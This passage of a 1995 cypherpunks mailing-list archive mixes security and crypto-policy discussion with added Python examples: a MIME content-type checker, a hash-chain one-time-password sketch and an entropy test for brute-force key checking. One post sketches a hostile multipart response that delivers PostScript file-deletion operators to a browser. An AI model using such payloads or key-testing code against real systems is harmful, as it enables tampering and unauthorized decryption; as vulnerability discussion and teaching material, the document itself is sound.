>     browser displays the data but leaves the connection open; whenever
>     the server wants it sends more data and the browser displays it,
>     leaving the connection open; at some later time the server sends
>     down yet more data and the browser displays it; etc.

Yes, the client "processes data" and then possibly displays it, while in

>     Client pull -- the server sends down a chunk of data,
>     including a directive (in the HTTP response or the document
>     header) that says "reload this data in 5 seconds", or "go load
>     this other URL in 10 seconds".  After the specified amount of
>     time has elapsed, the client does what it was told -- either
>     reloading the current data or getting new data.

Hmm.  Netscape's client blindly trusts and follows the server's
instructions and does what it is told to do.  If it's told to load a
particular document in five seconds, it does that.  It dances to the
server's instructions.  Something which should cause any Security
Administrator's hair to stand on end, as the server takes control of the
client's machine and "manipulates it".

> In server push, the magic is accomplished by using a variant of the
> MIME message format "multipart/mixed", which lets a single message (or
> HTTP response) contain many data items.  In client pull, the magic is
> accomplished by an HTTP response header (or equivalent HTML tag) that
> tells the client what to do after some specified time delay. 
>
> For server push we use a variant of "multipart/mixed" called
> "multipart/x-mixed-replace".  The "x-" indicates this type is
> experimental.  The "replace" indicates that each new data block will
> cause the previous data block to be replaced -- that is, new data will
> be displayed instead of (not in addition to) old data. 
> 
> So here's an example of "multipart/x-mixed-replace" in action: 

>>Content-type: multipart/x-mixed-replace; boundary=ThisRandomString
>>
>>--ThisRandomString
>>Content-type: text/plain
>>
>>Data for the first object.
>>
>>--ThisRandomString
>>Content-type: text/plain
>>
>>Data for the second and last object.
>>
>>--ThisRandomString--
> 
> The key to the use of this technique is that the server does not push
> the whole "multipart/x-mixed-replace" message down all at once but
> rather sends down each successive data block whenever it sees
> fit.  

And this is the problem.  We have a pipe.  And we have a server making a
decision when it will send the next data block.  I guess the server could
also decide dynamically what that data block is going to be once it has
opened its pipe to the client. 

That is way too much trust for a client to place in a server that it 
doesn't know if it can trust.

> The HTTP connection stays open all the time, and the server
> pushes down new data blocks as rapidly or as infrequently as it wants,
> and in between data blocks the browser simply sits and waits for more
> data in the current window.  The user can even go off and do other
> things in other windows; when the server has more data to send, it
> just pushes another data block down the pipe, and the appropriate
> window updates itself. 

Yep, the appropriate window just "updates" itself at the command of 
the server.  A good faith update ... or let's call it a good faith 
process. 

> So here's exactly what happens:
>
>     Following in the tradition of the standard "multipart/mixed",
>     "multipart/x-mixed-replace" messages are composed using a unique
>     boundary line that separates each data object.  Each data object
>     has its own headers, allowing for an object-specific content type
>     and other information to be specified.

Let's emphasize that what we have is a slave client at one end of a pipe
accepting an object-specific content-type from any server.  

This is not within the tradition of multipart/mixed. 

And this is a problem.

>     The specific behavior of "multipart/x-mixed-replace" is that each
>     new data object replaces the previous data object.  The browser
>     gets rid of the first data object and instead displays the second
>     data object. 
>
>     A "multipart/x-mixed-replace" message doesn't have to end!  That
>     is, the server can just keep the connection open forever and send
>     down as many new data objects as it wants.  The process will then
>     terminate if the user is no longer displaying that data stream in
>     a browser window or if the browser severs the connection
>     (e.g. the user presses the "Stop" button).  We expect this will
>     be the typical way people will use server push. 
>
>     The previous document will be cleared and the browser will begin
>     displaying the next document when the "Content-type" header is
>     found, or at the end of the headers otherwise, for a new data block.
>     The current data block (document) is considered finished when the
>     next message boundary is found. 
>
>     Together, the above two items mean that the server should push
>     down the pipe: a set of headers (most likely including
>     "Content-type"), the data itself, and a separator (message
>     boundary).  When the browser sees the separator, it knows to sit
>     still and wait indefinitely for the next data block to arrive. 

Now let's play with the prior example.  Let's say that we utilized
different types of objects.  I'll use multipart/parallel and
application/postscript. 

>>Content-type: multipart/x-mixed-replace; boundary=ThisRandomString
>>
>>--ThisRandomString
>>Content-type: application/postscript
>>
>>Data for the first object
>>
>>--ThisRandomString
>>Content-Type: multipart/parallel; boundary=ThisSecondRandomString
>>
>>--ThisSecondRandomString
>>Content-Type: application/postscript
>>
>>Data for the second object
>>
>>--ThisSecondRandomString
>>Content-type: application/postscript
>>
>>Deletefile
>>Renamefile
>>Filenameforall
>>File
>>
>>--ThisSecondRandomString--
>>
>>--ThisRandomString--

I think that the foregoing explains itself without me having to draw any
more maps, than is absolutely necessary.  The first data object sent is
application/postscript.  The second object is multipart/parallel. 

And it's where we conflict with federal requirements:

>    b.  Unauthorized manipulation of the computer and its associated
>        peripheral devices."[8, sec. I B.3]

And I think that this is applicable across the entire product line.

I wonder if this makes me eligible for a bounty for each product where 
there is this Security Bug??  That would be very chivalrous of Netscape
to offer me that.  Then maybe I could get a real computer rather than 
this crufty old Mac Plus (a yellow one) and my 2400 baud modem... and 
then, I might just be able to do some virtually real hunting.




Alice de 'nonymous ... (doing a bad impression of Elmer Fudd with 
                        thoughts of Bugs Bounty in his lil mind.)


                                  ...just another one of those...


P.S.  And yes I brought this whole issue (tangentially) to the 
attention of netscape.com yesterday afternoon.  I think I asked 
whether they were going to have a formal specification and register
their x-mixed-replace with IANA.  They haven't gotten to my email
yet, (I think).  Or maybe, I'm in the Bulk response group. <shrug>

P.P.S.  I give permission to have this propagate freely through 
        the cyber-aethyr.  All other rights are of course reserved.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
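
The per-part content-type concern raised in the message above, sketched as an added example that is not part of the original post and is not Netscape's code: a client-side check that walks a "multipart/x-mixed-replace" stream, recurses into nested multiparts, and only accepts parts whose type it renders itself. The allowlist, the nesting limit, the function names and the two sample streams (rebuilt from the examples quoted in the post, with placeholder payloads) are assumptions of this example.

```python
# Assumption of this example: media types the client renders itself,
# without handing the data to a helper application or interpreter.
PASSIVE_TYPES = {"text/plain", "text/html", "image/gif", "image/jpeg"}
MAX_DEPTH = 2  # assumption: multiparts nested deeper than this are refused


def parse_content_type(value):
    """Split 'type/subtype; k=v; ...' into (lowercased type, params dict)."""
    pieces = [p.strip() for p in value.split(";")]
    params = {}
    for piece in pieces[1:]:
        if "=" in piece:
            key, val = piece.split("=", 1)
            params[key.strip().lower()] = val.strip().strip('"')
    return pieces[0].lower(), params


def _finish(lines):
    """Separate one part's header lines from its payload at the blank line."""
    headers = {}
    i = 0
    while i < len(lines) and lines[i].strip():
        name, _, value = lines[i].partition(":")
        headers[name.strip().lower()] = value.strip()
        i += 1
    return headers, "\n".join(lines[i + 1:])


def split_parts(body, boundary):
    """Yield (headers, payload) for each part delimited by '--boundary'."""
    delim = "--" + boundary
    current = None
    for line in body.splitlines():
        stripped = line.rstrip()
        if stripped == delim + "--":      # closing delimiter ends the stream
            break
        if stripped == delim:             # a new part starts here
            if current is not None:
                yield _finish(current)
            current = []
        elif current is not None:
            current.append(line)
    if current is not None:               # last part (stream may never close)
        yield _finish(current)


def audit(content_type, body, depth=0, path=""):
    """Return a list of (part path, media type, 'render' or 'refuse')."""
    mtype, params = parse_content_type(content_type)
    if mtype.startswith("multipart/"):
        boundary = params.get("boundary")
        if boundary is None or depth >= MAX_DEPTH:
            return [(path, mtype, "refuse")]
        findings = []
        for n, (headers, payload) in enumerate(split_parts(body, boundary), 1):
            child = f"{path}.{n}" if path else str(n)
            # MIME default when a part carries no Content-type header
            child_type = headers.get("content-type", "text/plain")
            findings += audit(child_type, payload, depth + 1, child)
        return findings
    decision = "render" if mtype in PASSIVE_TYPES else "refuse"
    return [(path, mtype, decision)]


def safe_to_display(content_type, body):
    """True only if the stream has parts and every one is passively rendered."""
    findings = audit(content_type, body)
    return bool(findings) and all(d == "render" for _, _, d in findings)


TOP_LEVEL = "multipart/x-mixed-replace; boundary=ThisRandomString"

# Constructed sample 1: the two text/plain blocks from the quoted document.
FIRST_EXAMPLE = """
--ThisRandomString
Content-type: text/plain

Data for the first object.

--ThisRandomString
Content-type: text/plain

Data for the second and last object.

--ThisRandomString--
"""

# Constructed sample 2: the post's variant with a nested multipart/parallel
# and application/postscript parts; payloads replaced by placeholders.
NESTED_EXAMPLE = """
--ThisRandomString
Content-type: application/postscript

(placeholder payload)

--ThisRandomString
Content-Type: multipart/parallel; boundary=ThisSecondRandomString

--ThisSecondRandomString
Content-Type: application/postscript

(placeholder payload)

--ThisSecondRandomString
Content-type: application/postscript

(placeholder payload)

--ThisSecondRandomString--

--ThisRandomString--
"""

if __name__ == "__main__":
    for name, sample in (("first", FIRST_EXAMPLE), ("nested", NESTED_EXAMPLE)):
        print(name, audit(TOP_LEVEL, sample), safe_to_display(TOP_LEVEL, sample))
```

The decision is made per part, before any part is handed to a viewer, so a stream that starts with an acceptable type cannot switch to another one later without being noticed.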




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Fri, 13 Oct 95 06:52:41 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Identity database, another attempt...
In-Reply-To: <Pine.SOL.3.91.951012172747.18484C-100000@use.usit.net>
Message-ID: <9510131347.AA18300@outland>
MIME-Version: 1.0
Content-Type: text/plain


[ Stuff about nat'l DB to track "deadbeat dads" removed ]
> (3.) Compare and contrast this plan with the Soviet 
> internal passport / labor book system.

	Not really related to the deadbeat dads thing, but we
got a notice that the US DOT has mandated that all air passengers
must present a gov't issue photo ID with a name that matches that
on your ticket.  In addition it says that passengers should:

	* be prepared to answer questions about their bags.
	* be prepared to open the trunk of their car.

	Goodbye freedom, hello police state.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Oct 95 10:14:39 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
Message-ID: <aca3eae70c021004f9ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:22 AM 10/13/95, an116512@anon.penet.fi wrote:

>why is the cp meeting sponsored by sun?
>so we can hear a sales pitch on java?

Again, anonymity is used to cloak an ignorant flame.

But I'll respond anyway.

First, who cares who hosts the meeting? Does anyone think we are so
"corruptible" as to change opinions based on who hosts a meeting?

Second, we met for our first 15-18 months at the Mountain View offices of
Cygnus Support. Did this taint us? Did we all become Gnu hackers? Then we
met for about a year at the Mountain View offices of Silicon Graphics. Same
question.

Third, there is much interest in Java. Positive interest, and skeptical
interest. Most meetings have a focus on some topic....this one happens to
be a focus on Java.

Fourth, Marianne Mueller is coordinating this meeting, and she happens to
work for Sun. We should be glad we have a meeting site.

(Meeting sites that can hold 25-40 people for an entire afternoon are not
that easy to find. Pizza places typically don't get enthusiastic about
all-day meetings. Homes are typically too small. And so it goes.)

So, come out of your anonymity and stop the mindless insults.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 13 Oct 95 07:27:57 PDT
To: dl@hplyot.obspm.fr (Laurent Demailly)
Subject: Re: OneTimePasswd (not Pad)
In-Reply-To: <9510131250.AA28930@hplyot.obspm.fr>
Message-ID: <199510131429.KAA08941@homeport.org>
MIME-Version: 1.0
Content-Type: text



| I'm about to implement an OTPasswd (mostly like s/key) scheme to my
| www browsers/clients/proxy, but I was wondering is the mere principle
| of storing H^n(S) and requesting H^(n-1) from peer (H being your
| favorite one way strong hash function (MD5), and S your seed+secret
| passwd) could possibly be patented somehow and thus preventing using a
| similar scheme without getting a license (from
| bellcore?),.... if there are any usage conditions/restrictions?,... 

	There is an IETF working group standardizing OTPassword
technology.  Not sure how active it still is.
ietf-otp-request@bellcore.com 

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume
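
The scheme described in the quoted question, as an added sketch that is not code from either poster and not the S/Key reference implementation: the verifier stores only H^n(S), accepts a value whose hash equals it, then steps one link down the chain. SHA-256 stands in for the MD5 named in the post; the class names and the sample seed and secret are assumptions.

```python
import hashlib
import hmac


def iterate_hash(value: bytes, times: int) -> bytes:
    """Apply H to value `times` times, i.e. compute H^times(value)."""
    for _ in range(times):
        value = hashlib.sha256(value).digest()
    return value


class OtpServer:
    """Verifier side: holds H^n(S) and the counter n, never S itself."""

    def __init__(self, seed: bytes, secret: bytes, n: int):
        # Enrollment happens once over a trusted channel; only the
        # top of the chain is kept afterwards.
        self.n = n
        self.stored = iterate_hash(seed + secret, n)

    def challenge(self) -> int:
        """Index the client must answer with next, i.e. n - 1."""
        if self.n <= 1:
            # Index 0 would make the client send S itself in the clear.
            raise RuntimeError("chain exhausted: re-enroll with a new seed")
        return self.n - 1

    def verify(self, response: bytes) -> bool:
        """Accept iff H(response) == stored H^n(S), then step down the chain."""
        if self.n <= 1:
            return False
        candidate = hashlib.sha256(response).digest()
        if not hmac.compare_digest(candidate, self.stored):
            return False
        # The accepted value becomes the new stored hash, so the same
        # response can never verify a second time.
        self.stored = response
        self.n -= 1
        return True


class OtpClient:
    """Prover side: recomputes H^index(S) from the seed and secret on demand."""

    def __init__(self, seed: bytes, secret: bytes):
        self.s = seed + secret

    def respond(self, index: int) -> bytes:
        return iterate_hash(self.s, index)


def demo():
    seed, secret = b"ws1", b"correct horse"      # constructed sample values
    server = OtpServer(seed, secret, n=5)
    client = OtpClient(seed, secret)

    results = []
    first = client.respond(server.challenge())    # H^4(S)
    results.append(server.verify(first))          # fresh password
    results.append(server.verify(first))          # replay of a sniffed password
    second = client.respond(server.challenge())   # H^3(S)
    results.append(server.verify(second))         # next password in the chain
    results.append(server.verify(b"\x00" * 32))   # guess
    return results, server.n


if __name__ == "__main__":
    print(demo())
```

An eavesdropper who captures H^(n-1)(S) would have to invert H to obtain the next valid password, and the stored value on the server is no more useful than a captured password.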




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 13 Oct 95 07:29:48 PDT
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510121731.A6228-0100000@offshore.com.ai>
Message-ID: <Pine.SUN.3.91.951013102909.29537B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995, Vincent Cate wrote:
[..] 

> If while you are outside the USA you want to write some software that uses
> encryption and sell it worldwide, let me know.  I could put you up while
> you wrote it and my company could sell it for share of the selling price. 
> Let me know what you are thinking of and how long you think it would take. 

Of course if you are a US person (citizen or green card holder) this is 
just as much a violation of the ITAR as if you did it from inside the US...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Fri, 13 Oct 95 07:39:35 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Judicial Access to Keys (Was: Re: Banque des Cypherpunks)
In-Reply-To: <199510120730.DAA01478@thor.cs.umass.edu>
Message-ID: <Pine.D-G.3.91.951013101859.5382B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995, Futplex wrote:

> Scott Brickner writes:
> > I don't remember if any key-splitting schemes currently allow it, but how
> > about this:  the escrow agencies would be the courts, requiring one
> > assent from each judge on the appeals chain.  As each judge rules
> > against the defendant or denies the appeal, he adds his piece of the
> > key to the ruling.  When you reach the top of the chain, then *and only
> > then* can you be traced.
> 
> JAK (Judicial Access to Keys) sounds as though it wouldn't give the LEAs a 
> chance to pre-emptively snoop on message traffic before prosecution, unlike
            ^^^^^^^^^^^^^                          ^^^^^^ 
> POTS wiretaps and Clipper. I don't see the govt. ever favoring such a
> scheme that doesn't help the LEAs to "gather" evidence to justify an
> indictment. They will probably skip JAK instead <ducking ;>....

I think that the bigger concern would be that a small set of judges at 
each level would be designated JAK judges (god forbid that they all have 
some idea of what the issues are ...).  Then LEA would be certain to 
present only the most egregious cases to them until they got in the habit 
of signing off on them.   Then, the marginal requests for access would 
slide through.  

I think Futplex insinuated that this would occur post charge rather than 
pre charge, to which LEA would never agree.  You can't indict without 
evidence (at least in theory :-)) and if you're going to get blown 
out of the water as soon as the encrypted traffic is decrypted by the 
defendants for trial ...  well, let's just say it is better to lose early 
and quietly than later and in public.

All this said, and after much personal wailing and gnashing of teeth, I 
*personally* believe GAK/MKE/JAK etc. is unworkable and should be quietly 
dropped.  With so many ways around key escrow,  especially the 
existence of PGP, I think the horse has left the barn.  The issue won't 
be dropped, of course, at least in the short run.  I appreciate all the 
thoughtful replies to my "Cypherpunks Key Escrow" proposal, and will 
ignore the few that were, ahem, not so thoughtful.

I've been avoiding posting about this for weeks due to my own indecision, 
my workload, and a sprained wrist which makes typing an adventure, but 
when directed to "write an article for [a law enforcement magazine] that 
is pro-MKE," I had to reach a personal decision about this.  I am 
generally very open about what I think/believe etc. and have few secrets 
from my friends.   I get the impression that the majority of you have a 
different view about your personal life, but that's why Baskin-Robbins 
has 31 flavors, not one.

I also strongly believe that you gravely overestimate the threat of MKE, 
probably overestimate the interest LEAs have in your personal affairs, 
and have little idea how hard it is to get court approval for wiretaps, 
and presumably access to escrowed keys.  I did mention to my U.S. 
Attorney that the proposal that "other lawful authorities" [besides 
judges] could grant access to escrowed keys was especially bothersome.  
He took it well, and said that was a legitimate point (that I don't think 
will go anywhere).

Now understand that, as a lawyer, I get paid to say what my client (the 
USA) wants me to say, within certain bounds, so I will write the 
article.  My heart will not be in it, though. 

I would appreciate it if you wouldn't send this to Janet Reno or 
otherwise use it, with attribution, at least until I find a new job!  :-)
I stay in enough trouble here without this being circulated through the 
Department and placed in my personnel file.

Lest there be any doubt: I SPEAK ONLY FOR MYSELF on this issue.  The 
Department's and the Administration's* position has not changed to my 
knowledge (except as has previously been discussed in this forum).

*****


*Some of you like to blame the Clinton Administration for all of this.  
Be mindful that all this started in the Bush Administration or earlier.  
There's plenty of blame to go around.  I encourage the Cypherpunks 
anarchy to use its recent successes with Netscape, and soon with MS, 
together with its concomitant increase in credibility to educate the 
public and the politicians.

EBD

 
> -Futplex <futplex@pseudonym.com>
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Oct 95 10:42:54 PDT
To: vince@offshore.com.ai>
Subject: Exporting Mental States
Message-ID: <aca3efb20f0210041a0a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:30 PM 10/13/95, Michael Froomkin wrote:
>On Thu, 12 Oct 1995, Vincent Cate wrote:
>[..]
>
>> If while you are outside the USA you want to write some software that uses
>> encryption and sell it worldwide, let me know.  I could put you up while
>> you wrote it and my company could sell it for share of the selling price.
>> Let me know what you are thinking of and how long you think it would take.
>
>Of course if you are a US person (citizen or green card holder) this is
>just as much a violation of the ITAR as if you did it from inside the US...

And recalling Matt Blaze's hilarious tale of trying to get the right forms
filled out and approved at an airport prior to departure for Europe, one
has to wonder what confused looks would be gotten were someone to try to
get a "Commodity Jurisdiction Request" (or whatever is needed) to export
one's thoughts....

"Yes, I'm trying to find out what forms I need to fill out to export the
cryptography knowledge that's now in my head."

"Huh?"

"Well, I understand that it's illegal for me to think crypto thoughts in
Anguilla, where I'm going on vacation. So, to protect me in the event I
talk in my sleep, and a foreign national hears me, I want to register with
your office."

"Huh?"

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Thu, 12 Oct 95 10:59:12 PDT
To: cypherpunks@toad.com
Subject: IDEA algorithm
Message-ID: <v02120d01aca45743fb66@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


This may be an odd question, but who is it that owns the IDEA algorithm?

We've had a number of requests regarding licensing RSAREF tying into
legitimizing PGP products. Part of that includes IDEA obviously.

Anyway, take care.

Jonathan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Fri, 13 Oct 95 08:22:48 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.SUN.3.91.951013102909.29537B-100000@viper.law.miami.edu>
Message-ID: <Pine.3.89.9510131128.A6667-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 13 Oct 1995, Michael Froomkin wrote:
> On Thu, 12 Oct 1995, Vincent Cate wrote:
> > If while you are outside the USA you want to write some software that uses
> > encryption and sell it worldwide, let me know.  I could put you up while
> > you wrote it and my company could sell it for share of the selling price. 
> > Let me know what you are thinking of and how long you think it would take. 
> 
> Of course if you are a US person (citizen or green card holder) this is 
> just as much a violation of the ITAR as if you did it from inside the US...
> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | 

Yes, I am still a US citizen, so far. 

The corporation I work for is a legal entity of Anguilla.  I would not
personally be selling it, the corporation would.  Do you think that is ok? 

What if I had a couple Anguillian friends form a corporation for this
purpose (buying encryption software written in Anguilla and selling it
internationally)?  No trouble yet, right?  What if the people who come and
write it are US citizens?  

I don't see how US law can cover corporations in other countries.

PS - it is good to CC me (as you did) as I only get cypherpunks-lite, and
so may not see a message, or it may be delayed. 

Thanks,

  --  Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ron McCoy <rmccoy@mercury.interpath.com>
Date: Fri, 13 Oct 95 08:35:08 PDT
To: cypherpunks@toad.com
Subject: Re: responce to graphic encryption replies
In-Reply-To: <199510130432.AAA14986@thor.cs.umass.edu>
Message-ID: <199510131535.LAA01216@mercury.interpath.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Steve Orrin writes:
> [...]
> >     One of the key strengths, as I see it, of graphic encryption is 
> > that during decryption via hacking, there is an added time element when 
> > a human interface is required to verify the product, ( since it is a 
> > graphic picture being produced, regular checksums for intelligible 
> > words can't be used sans implementing OCR), even if this is only 10 
> > milliseconds per try this increases the time to crack 
> 
> This is an interesting point I hadn't previously considered. Can anyone
> comment on the state of the art in fast approximate character recognition ?
> I expect that the people working on recognition of text in TV pictures etc.
> would have a good idea. 
> 
[....] 
> 
> -Futplex <futplex@pseudonym.com>
> 

I wouldn't think you would have to use OCR to detect a successful 
decryption. The graphic file is going to have a highly correlated 
structure, long runs of white space etc. The statistics for such a file 
would be different than the random distribution you'd get from using the 
wrong key. Even if the graphics format is compressed, leading to a more 
even distribution, there might be known plaintext at the beginning of the 
file, headers, size etc.


Ron McCoy
Rmccoy@mercury.interpath.net
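
The statistical test and the known-header test from the reply above, as an added example that is not code from any poster: a candidate decryption is scored by byte entropy, longest run and leading magic bytes, with no human or OCR in the loop. The XOR keystream cipher, the 256-key candidate list, the "BM"-prefixed sample image and the thresholds are all constructed for illustration.

```python
import hashlib
import math
from collections import Counter


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Constructed stand-in cipher: XOR with a SHA-256 counter keystream."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + offset.to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


def entropy_bits_per_byte(data: bytes) -> float:
    """Shannon entropy of the byte histogram; 8.0 means uniformly random."""
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in Counter(data).values())


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value."""
    if not data:
        return 0
    best = run = 1
    for prev, cur in zip(data, data[1:]):
        run = run + 1 if cur == prev else 1
        best = max(best, run)
    return best


def make_sample_image() -> bytes:
    """Constructed 'page scan': 2-byte magic, white rows, a few dark strokes."""
    rows = []
    for y in range(64):
        row = bytearray(b"\xff" * 64)
        if y % 8 == 3:
            row[10:50] = b"\x00" * 40
        rows.append(bytes(row))
    return b"BM" + b"".join(rows)


def score(candidate: bytes, magic: bytes = b"BM") -> dict:
    """Machine-checkable signs that a candidate is an image, not noise."""
    entropy = entropy_bits_per_byte(candidate)
    run = longest_run(candidate)
    return {
        "entropy": entropy,
        "longest_run": run,
        "header_ok": candidate.startswith(magic),     # known plaintext
        "stats_ok": entropy < 6.0 and run >= 16,      # correlated structure
    }


def plausible_keys(ciphertext: bytes, candidate_keys) -> list:
    """Keys whose output passes the statistical test alone."""
    return [k for k in candidate_keys
            if score(keystream_xor(k, ciphertext))["stats_ok"]]


def demo():
    image = make_sample_image()
    true_key = bytes([0x5A])                           # constructed key
    ciphertext = keystream_xor(true_key, image)
    keys = [bytes([k]) for k in range(256)]            # tiny constructed key space
    wrong = score(keystream_xor(b"\x00", ciphertext))  # output under a wrong key
    return plausible_keys(ciphertext, keys), score(image), wrong


if __name__ == "__main__":
    hits, good, bad = demo()
    print(hits, round(good["entropy"], 2), round(bad["entropy"], 2))
```

The per-candidate cost is a histogram and one pass over the bytes, so rendering the result as a picture adds no meaningful work factor; the strength has to come from the key size.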



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Fri, 13 Oct 95 08:41:34 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.SUN.3.91.951013102909.29537B-100000@viper.law.miami.edu>
Message-ID: <Pine.3.89.9510131114.A70910-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 13 Oct 1995, Michael Froomkin wrote:

> > If while you are outside the USA you want to write some software that uses
> > encryption and sell it worldwide, let me know.  I could put you up while
> > you wrote it and my company could sell it for share of the selling price. 
> > Let me know what you are thinking of and how long you think it would take. 
> 
> Of course if you are a US person (citizen or green card holder) this is 
> just as much a violation of the ITAR as if you did it from inside the US...

Really? I thought except for income taxes, US laws only apply in American
territory as opposed to applying to American people wherever they are (as 
I heard Germany's does).

What if you were a dual citizen (US/Canada in my case)?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 13 Oct 95 11:42:51 PDT
To: cypherpunks@toad.com
Subject: proposal: "security spectrum scale" (SSS)
Message-ID: <199510131841.LAA17086@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



regarding the recent Markoff NYT article on NFS weaknesses, I agree
it seemed to be overblown. but in fact I have been getting that feeling
from *all* the recent articles on the netscape bugs etc (egad, am I
mistaken, or was there front page NYT coverage for a *buffer*overflow*?
at least there was for a single *poorly generated random seed*!!). 
for example, in another, the fact that netscape had a buffer overflow in URLs
was translated by a reporter into "a similar bug was used by Robert
Morris in the infamous worm that infected the entire internet a few
years ago" or something similar.

it seems to me what is lacking in all this is a *security spectrum*.
unfortunately security experts sometimes have a tendency to equate
*any* security weakness with a catastrophic one. while this is a good
approach in general, i.e. to be as conservative as possible, in 
practice there can be no doubt that some security weaknesses are far
less severe than others.

if the security *experts* conflate the issue of the *severity* of
a security breach (and I see this happening all the time on this
list), there is little surprise that reporters aren't
figuring it out either. some of the really obvious examples of the kinds of
differences in security that are being conflated: client vs. server
problems (server problems are far worse of course; the netscape bugs
were mostly *client* problems), subnet vs. overall network problems, bugs
that allow people to merely crash a system vs. submit arbitrary
code, etc.

to aid this serious problem, I propose the creation of a 
UNIFIED SECURITY SPECTRUM RANKING.

this would be a list of all the different types of security weaknesses
a system can have, and their LEVEL OF SEVERITY. it would attempt to 
rank every type of security breach possible. then, when a new
security weakness is discovered, it could be ranked A1 or B5 or C6
or whatever. this would be a sort of technological "richter scale"
that would allow the novice to immediately understand that a given
bug that was recently discovered (say, the recent netscape bugs)
was, say, not really as potentially severe as the Morris worm.

a press article might say something like,  "the recent netscape
bug was ranked a B5 on the security scale by experts. this means that an 
unauthorized intruder could break client software. the bug could
potentially be as serious as A3, meaning that arbitrary code could
be submitted. the other bug was classed B3, because it allows the
detector to grab unauthorized data, but still be detected in 
doing so." 

etc!!

I think it is pretty obvious how much of a positive effect this could
have in quantifying and tracking and publicizing new bugs. it might
make it impossible for a reporter to give an improperly alarmist
position. for example, no one would take seriously an article that
gets excited about a 3.6 richter scale earthquake. similarly, the
reader might be able to draw his own conclusions if we came up with
a sufficiently universal scale and it is widely used in articles.

furthermore, this scale would tend to help the reporter/editor immediately know
if a given bug report is newsworthy (if they continue to enthusiastically
report bugs, although I wonder if this is a fad that may die out).
and ultimately it might really help the issue of "proper attention
to bugs". the public is getting a scare story for almost every new
bug, and this is just not appropriate. to use my tired analogy, it is
like the media putting every dinky earthquake item on page 1.

another idea behind the rating: it might be a sort of matrix format,
such as "a-6-alpha" where each of the elements indicates some kind
of independent factor. for example the "a" might mean "client side",
the "6" might mean "crash only", the "alpha" might mean "breach
cannot be detected after the fact". however it shouldn't be so
complicated that the novice can't immediately determine which of
two rankings is more severe.

now, I am really rather surprised that no such scale appears to 
exist currently. I highly suspect the NSA probably has a system for
this but unfortunately it is not being used by CERT or anyone else
